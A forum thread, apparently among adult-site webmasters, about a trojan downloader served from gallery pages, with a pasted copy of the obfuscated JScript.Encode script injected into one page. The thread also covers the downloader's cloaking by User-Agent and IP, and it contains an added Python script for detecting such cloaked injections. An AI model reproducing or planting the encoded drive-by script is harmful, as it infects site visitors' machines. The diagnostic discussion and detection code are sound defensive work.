I was able to download it, but it downloaded as a 0 (zero) byte file.
I have about 20 of them in my temp files directory. They are 9kb in size. I copied it to an old machine and ran it just for fun. All it did was open a URL in my browser to download the same file (same URL at rockys). Nothing new is running in system processes. I'm running a full scan with Norton, and I'll also run one with AVG and AdAware just to check. I'm not at all sure what it's supposed to be doing. According to Symantec, the class "trojan horse" is just a generic label for when they don't really know what it is. The classification is based on behavior, not contents. It seems pretty harmless, so far. Just a pain in the butt.
Still fucking sucks.. surfers freak out and close the page instantly regardless of whether it is harmless.. :(
Is anyone else getting a redirection on this gallery?
http://www.darkestelf.com/dp19t.htm
Usually programs like this can remember IPs.
Just checked from UNIX (new IP); the code is still there. fusionx, the second time from the same URL they upload another program to your comp. Read about trojans somewhere else; they are not harmless.
Shemp, it is traffic-shop hosting; they redirect a few percent of traffic.
I just got a popup from Norton with the trojan.... Shit is still on there..
And I have paid versions of a few nice spyware scanners and I scanned earlier today along with Norton, so I had nothing on my machine... Well, now I do. :mad:
Quote:
I checked my system registry and there's nothing new in the Run, RunOnce or RunAsService keys. It is odd that I can't find anything on the web that describes a trojan or any hijack attempt that creates a file named this way (windowsupdatexxxxx.exe).
:(
Shemp, did you get me right?
It is the host who redirects traffic. Your webmaster may not know about the redirection; just recommend that he move the site to another host. fusionx, there are too many trojan.downloader versions, but as far as I can remember, the second file (even if it is downloaded from the same URL) is another file; the second file opens a few ports on your comp and it is ready to download and run ANY PROGRAM. Downloaded programs do the rest.
Tommy from Tommy's Bookmarks was recently having a similar problem.
Nothing seemed to show up for him, but a lot of other people were seeing it. I'm not sure what he did to get rid of it.
Quote:
We don't allow free hosts for preferred submitters... the webmaster must have complete control of the domains. That's part of the agreement of getting a submit account with us..
fusionx, you have to let it download the second program first, but it is dangerous.
Shemp, OK, understood, good rule.
So Snake's server is hacked?
Or how the hell did that thing get there? Man, this is scary.
My server hasn't been hacked. I don't get the code; I think it's a JScript exploit that takes advantage of certain browsers. But I'm still looking into it.
I got a virus on my laptop, and I can't get rid of it! And now I can't surf, and my wireless connection is totally nonexistent (not even showing up on the Network Connections screen).
This fucking sucks!!! And they are chasing spammers? WTF?
Sorry, Snake, but I see this code if I download your page without any browser, so it cannot be a problem of certain browsers.
GoLiaT, either snakesworld was hacked, or his hosting provider was hacked, or (only in theory) he inserted this code himself.
Quote:
Are you using wget, or something else? I'd like to see if I can duplicate it from here. - Thanks, jpoker
If it was hacked, don't you think I would be able to see the code? I haven't seen it yet on any of my pages.
I did see it on Pornno.com though, so I'm still trying to figure out why I can see it on his page and not mine. Any tech geniuses want to throw in a couple of cents?
This is the source I got at the bottom of the aforementioned 'links' page:
<SCRIPT LANGUAGE="JScript.Encode">#@~^5Q0AAAhahahaha@&@&@&-mD,wWai@&-lMP;w^WC[Ni@&-lMPW(%I@&7lMP8E.sp@&-lM~tbN[n q:LI@&\CD,OKYC^W(Li@&@&6;x1YrW P$C9ADKA/D`*@&`@&ik6`Ul-rTlOWM lawHCs+"xEtk^DKdK0O,q Y+MxOPA62VKDn.r#@&i7DYEMU~Fp@&ikW`ZUm\romOWMR^GK 3kn3 l8V[*@&7iDYEMx,qi@&P~P,P~~,k0vUl7komOGDcw^lO0G.s"xJqr x2 Eb@&PP~~,P~Pi.Y;Mx,Fi@&P,~P,P~Pb0cUm\kTCYKDR!dnDz oxORrU9+ar6cJt?(3,*RXE*'xO8~L[~ l7komYK.R!/nDzonUDRk [+Xr0vE\?&2,v Jbx{Oq#@&~P,P~~,Pd.nDE.x,qp@&7b0vNW1EsnxDR^WK3rnck x9n6}0`rhdka'+6E#@*R8#@&di.+DE.U,Fi@&N@&@&;w^GmNn9 '~lN~DKA/Dc#p@&@&@&b0`e;w^Wl9n[#@& @&d8E.s{J4YD2)JzAASRDG^0XdwK. wC^l1+R1Ws&l9z8l xn.kz O*!+z%y*T*Jbx[WAd`w[lDnJ3`\CDtR.C NG:vb3J~r#c/E(/D.`y~X#3J nX+Jp@&8@&@&0!U^YbW PrxrOaW2`*@& @&P~~,PP~~b0c"aGa#@&,P,PP,P,`@&,P~P,P~7aWw{Ak NWS ^DlD+KW2;a`bi@&7\mD~G~WNz~{P2Wa 9W^!:xYc4K[Xp@&@&@&,P~~,PP,2WaRNK^;:xDR8o/G^W.'r8VmmVEp@&dG$KNzRkOHVnc4KDND,xPr/GVbN~8^lm0~!a6Jp@&7W~W9X /Oz^+ wKdkDkGU{Jl8dKV;YEp@&7KAKNXc/DzVRs+6Yx~r!Jp@&dKAW9z /DX^+ YG2{PE!rI@&i\C.,Y+h2p@&7Yha'v@!f&.PkYHs+{J2WkkOrK x)MnVmYk7nIJ@*@!mP4DnW{Jv_r:-rPGU~VE.xEwCDUDR[Km!:+ YcL+D2s+s+UO~Xq9c-rk{6.C:-r# /Oz^+ \bdk(ksrDX'wE4k[NU'Jv,Jp@&dD+s2_{@&EW HG;k+r!O'ENW1;h+ YconY3s:nxD$X&NcwrmVrn YwJ* kYz^+c\kkk(rVbYz''J4r9N+ wJEP-@&6UHKEk+6\n.{B[W1;:xO T+Y3s:nxD$Hq[v-rmVb+ O-r# /DXsnc\kkr4bVkDzx-r\b/r4sn'JvP'@&W HG;k+fGA 'vwm.xOcNKmEs+ ORT+O2^+hn YAH(Nv-JbmWDm:-E# dDXs+c-kkk8r^kYzx'J-kkr(Vn'JpwlM+ ORaW2RktGAvF~8SFBF#p2CDxDR;wsGmNnN{qial.n YR9G;Vrm0c*iv@*P'@&q'@&@!9qjP~qG'wE1VkUY'JPUPeSA' 'J-kdr(kskDz)4k[[xi~2K/rYbG )C(/KVED+p~YKwlOy*I~^+0DlOy*i'E@*-@&@!b:LPUG1l^t~4KD[nM'F~dDXs+{wrhr9Y4'*Z!aai4+roDtxXZ!wXIP1EDkG.)4l NI-E~9XU/M^''JEQ(EDsQr-EP@*@!JNr7@*@!zl@*@!J[k7@*Ei@&@&@&~,PP,~P,WAK[zRbx +.CP\d'O+s2i@&P~~,PP~7)@&N@&@&W!x^DkKxP1VCxv#@& @&d;2^Wl9nN{Fi@&~~P,P,P~kWcaW2#@&~P,P~~,Pd2GaR4k9n v#I@&8@&@&k6`e;w^WCNNb@&P@&P,~P,PP,rUkDwKwc#I@&ih rx9GhcWU80W.n!xsWm[{msl i@&)@&@&@&0!x^YbWU~GWZ^rm0`#@&`@&P,P,P~P~[Km;:UYcmGG0k+xEs/rw{Xi~alDt'Ji,n6ak.+k'\G ~P2qPG+m,+T!lPy&l*1ll,~j:/iri@&7Skx[GSRd+DPb:nKED`BK4N 
m^k^3v#IvB&!Zbi@&8@&@&W;x1YbWUPd4Kh2Wac#@& @&~,PP~~,Pr0v;aVGmNN#@&P,~P,P~PiDnO!Dxp@&P,PP,~~P K4N'AkU[Kh +7nxDRd.12VnhxOi@&~,P~,P,Pk6`e2Wa#@&P,P~~,PPP@&P, PP,~~Pik kOwG2v#I@&,~P,P~~i8@&@&7aW2Rk4KhcSk NWSR-+ Y /1Dnn (~Srx9Whcn-+ Yc/^Dnn 5SFBq#p@&7[KmEhn Y oOAVns+ YAHq9cJb{WDm:nE*R/DzVRVWO'Sk NGh n7+UYcdmM+nUoOhrU9WARk^M+n S0Y NK^Es+UYc4G[HRm^r+ YSWO_9W1Eh+UOc4GNH /1DGs^S+WOp@&7NK^!:n Yco+D2^n:xOAHq[crk{6.ls+J* dYHVROW2xSkUNKAR\nUDR/^.+U5 Abx[Khc/mM+UKKwRNKm;hxYc8W9XR1sr+ Y:W2_[G1Eh+ OR(W[zc/m.G^VPWaI@&8@&@&@&6Ex1YbGx,?nYzVs37+xDd`*@& @&rW`aWaR[W^;s+UYc.+mNzjDlYnx{J^Ws2^+OJ,[[,YKOl^W8Le'[G1E:UYclV^ s+ oDtb@&`@&iYGYmsW(Lx[KmEhn Y l^scVn oDti@&d6GDvk~',!I~bP@!,[W1E:UORmV^Rs+ULDtIPbQ_* @&7,PPrWvNGm!hxOcl^V`b#cOlT1C:'xEzJPL'P9Wm!hnxDR mVs`rbck["{Em^knUDmlssr#@&di[Km;s+ YRmV^ck*RGxsW;d:W7n'ktWS2Gwp8@&8@&ddnDKr:GED`Ej YbssA\nxDdv#Ir~,c!Z#p@&8@&@&r0v";2^Wl9nN*@& @&7d+DKb:nW;OvJj+D)V^2-n Y/cbpJSPWTZ#I@&dSkx9WS /YPks+G;D`BSrx9Whc[n0mE^YjYCO!/xJ,EBB TTZ#i@&@&iNGm!hxOchMkY`E@!Nb\~PbNxr|0Dmh+,xlsnxk |0Mlh+~~UKeSAxJ7kdr(kVrOH)4k9[xIaWkkYbW ll(/GV!YnIDWw{Ti^+0DxTiSk9Y4)qI4+ro4O)8iG-D0sGS)4k9[xE@*@!b0Dm:~0Mlh+(W.[D'rqJ,xlsnxJ1Vb+UYW.m:nJ,rN{J^sb+xOWMlh+r~,/OHV'JaWkrYbWU)M+sCDk\IYKw' +X!pV0O'R*W!Ihb[Y4){TZitnrTtO)FTZiE@*@!Jk0Mlsn@*@!z[k7@*vbp@&d9Gm!:+ O hMkD+cB@!C,0GV9nD{Jd4VVldDl.Y!2rPOmDT+Y{J1skxO0M lhnrPk9xJ1VkUOmmV^J~/Oz^+xJ7r/b4rsbYXl4bN[+ I9kdaVmX) W ni(+4l7kG.=ED^ca9+0m;sY[b m4W./^k^3*IJ@*@!&C@*B#I@&iNGm!hxOcoY2^+snxDAzq9`E^^k+ OmmVVrb m^k13c#I@&iNGm!h+ Y AMkYncE@!r0MCs+~kD1'Jm4K;Y=4sl 3E~kYX^n'r\kkr8k^kDXltr[9+Ui9r/aVCz=xWUnpJ@*@!Jr6DCs+@*B#p@&)@&@&bVoEAAhahahaha^# ~@</script> |
I just did a wget from one of my Unix servers to http://www.snakesworld.com/links.html
and I don't see any of this code. - F
jpoker,
In any UNIX shell run the command:

telnet www.snakesworld.com 80

You will see something like this:

Trying 64.158.30.220...
Connected to 64.158.30.220.
Escape character is '^]'.

Then type something like this:

GET /links.html HTTP/1.0
Host: www.snakesworld.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8
Accept: */*
Connection: close

and press "Enter" twice, and you will see the page source code.

Snake, no, I do not think so. Have you turned off cookies? Which IP addresses did you use to see your page? From how many computers did you try to do it?
jpoker,
this system checks the User-Agent, so wget will not work.
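The two posts above describe a manual check: send a raw HTTP/1.0 request with a browser-looking User-Agent and compare what comes back with what wget receives, because the injected script is only served to some request profiles (and, as others in the thread note, possibly only to some source IPs). The script below is an added example, not code from anyone in the thread. It automates that comparison: it builds the same request the post types into telnet, splits a raw response into status, headers and body, and flags bodies that carry the indicators visible in the posted source (a `JScript.Encode` script tag and the `#@~^` / `^#~@` markers that wrap an encoded body). The host, path and User-Agent strings are the ones quoted above; the sample responses are constructed for the offline demo; `fetch_raw` is assumed to be pointed at a host you administer and is not exercised by the demo.

```python
import re
import socket

# Request profiles from the thread: the injected code was served to the
# MSIE User-Agent but not to wget. Constructed wget string for illustration.
PROFILES = {
    "msie": "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)",
    "wget": "Wget/1.9",
}


def build_request(host, path, user_agent):
    """Build the HTTP/1.0 request the post types into telnet by hand."""
    return (
        f"GET {path} HTTP/1.0\r\n"
        f"Host: {host}\r\n"
        f"User-Agent: {user_agent}\r\n"
        "Accept-Language: en\r\n"
        "Accept-Charset: iso-8859-1,*,utf-8\r\n"
        "Accept: */*\r\n"
        "Connection: close\r\n"
        "\r\n"
    )


def split_response(raw):
    """Split a raw HTTP response into (status line, headers dict, body text)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body.decode("latin-1", errors="replace")


def fetch_raw(host, path, user_agent, port=80, timeout=10):
    """Fetch over a plain socket, with no redirects and no cookies, so the server
    sees exactly the headers chosen here. Assumed to target a host you own;
    not called by the offline demo below."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_request(host, path, user_agent).encode("latin-1"))
        chunks = []
        while True:
            data = sock.recv(65536)
            if not data:
                break
            chunks.append(data)
    return split_response(b"".join(chunks))


# Indicators taken from the script pasted in the thread: a JScript.Encode
# script tag, and the start/end markers that wrap an encoded script body.
INDICATORS = {
    "jscript.encode tag": re.compile(
        r'<script[^>]*language\s*=\s*["\']?jscript\.encode', re.I),
    "encoded-script marker": re.compile(r'#@~\^|\^#~@'),
}


def find_injected_scripts(body):
    """Return (indicator, offset) pairs for every suspicious match in the body."""
    hits = []
    for label, pattern in INDICATORS.items():
        for match in pattern.finditer(body):
            hits.append((label, match.start()))
    return hits


def compare_profiles(bodies):
    """bodies maps a profile name to the body it received. Returns
    (cloaked, per-profile hits). 'cloaked' is True when at least one profile
    gets the injection and at least one does not, i.e. the server is choosing
    content based on the request (or on the vantage point it came from)."""
    hits = {name: find_injected_scripts(body) for name, body in bodies.items()}
    flagged = {name for name, found in hits.items() if found}
    cloaked = bool(flagged) and flagged != set(hits)
    return cloaked, hits


# Constructed sample responses; not captured from any real host.
CLEAN_RESPONSE = (
    b"HTTP/1.0 200 OK\r\nContent-Type: text/html\r\n\r\n"
    b"<html><body><a href=\"gallery1.html\">gallery</a></body></html>"
)
INJECTED_RESPONSE = CLEAN_RESPONSE.replace(
    b"</body>",
    b"<SCRIPT LANGUAGE=\"JScript.Encode\">#@~^AAAA^#~@</script></body>",
)


def demo():
    """Offline run: the MSIE profile 'receives' the injected page, wget the clean one."""
    bodies = {
        "msie": split_response(INJECTED_RESPONSE)[2],
        "wget": split_response(CLEAN_RESPONSE)[2],
    }
    return compare_profiles(bodies)


if __name__ == "__main__":
    cloaked, hits = demo()
    print("cloaked:", cloaked)
    for name, found in hits.items():
        print(f"{name}: {found}")
```

Because the server may also key on the client's IP, a single vantage point can miss the injection even with the right User-Agent; run the same comparison from a second network (as the poster did from a UNIX box with a fresh IP) before concluding a page is clean.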
I don't believe it - Snake registered for GFY before I did!!!!!!!!!!!!!
Hey Snake - get into Vegas a day early - 2:30pm Jan 3 is the TGP VIP party this year.
Quote:
Snake runs a clean site and has NEVER screwed his surfers around, EVER. He's a straight-up honest, awesome guy I stand behind 100%.
Comes up clean for me.
Quote:
Look in your startup folder.
Quote:
Snake, Norton goes off for me too on your page.
WTF is this bullshit. I didn't put anything on my site, and of course I can't see it either. :mad:
Now to figure out how to get rid of this shit. JJJ
This makes me wonder how many people's sites are exploited, or machines for that matter.
I surf TGPs all the time looking for galleries and stuff and get popups, virus attempts, exploits and whatever all the time.
Couldn't the hacker check the FTP logs, see what IP Snake logs in from, and make sure any IP from that block sees the normal page?
I don't get this code on either site. They both come up clean for me.
Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc